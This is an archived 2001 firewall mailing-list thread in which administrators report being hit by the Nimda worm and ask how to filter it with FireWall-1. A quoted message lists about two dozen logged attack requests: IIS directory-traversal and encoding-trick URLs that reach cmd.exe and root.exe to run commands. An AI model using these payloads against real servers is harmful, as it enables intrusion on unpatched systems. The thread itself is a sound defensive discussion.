[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] Re: [FW1] New worm on the road?
That's the NIMBA worm.. I've been trying various resource filters but no luck yet. Had well over 3 million log entries so far *today*.. an avg month for us is ~30,000. (I'm stopping it with a more blunt filter for now..) If I get a good rule working I'll post it up, and hope others will do the same. Regards from NYC, Joe >>> "Patrick Coomans" <[email protected]> 09/18/01 05:35PM >>> Since this evening I am experiencing massive attacks on HTTP (IIS oriented I presume) from many different IP addresses. They all look like: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /MSADC/root.exe?/c+dir HTTP/1.0 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Is anyone aware that this is some new kind of worm? Now my FW1 question: can I create a HTTP resource (secure server) that blocks all requests that e.g. have a .EXE in it ? Or would that slow my FW1's down to much? Any other suggestions for good products that can do HTTP content inspection and that cooperate or can co-exist with fw1 ? Thanks, Patrick ================================================================================ To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html ================================================================================
|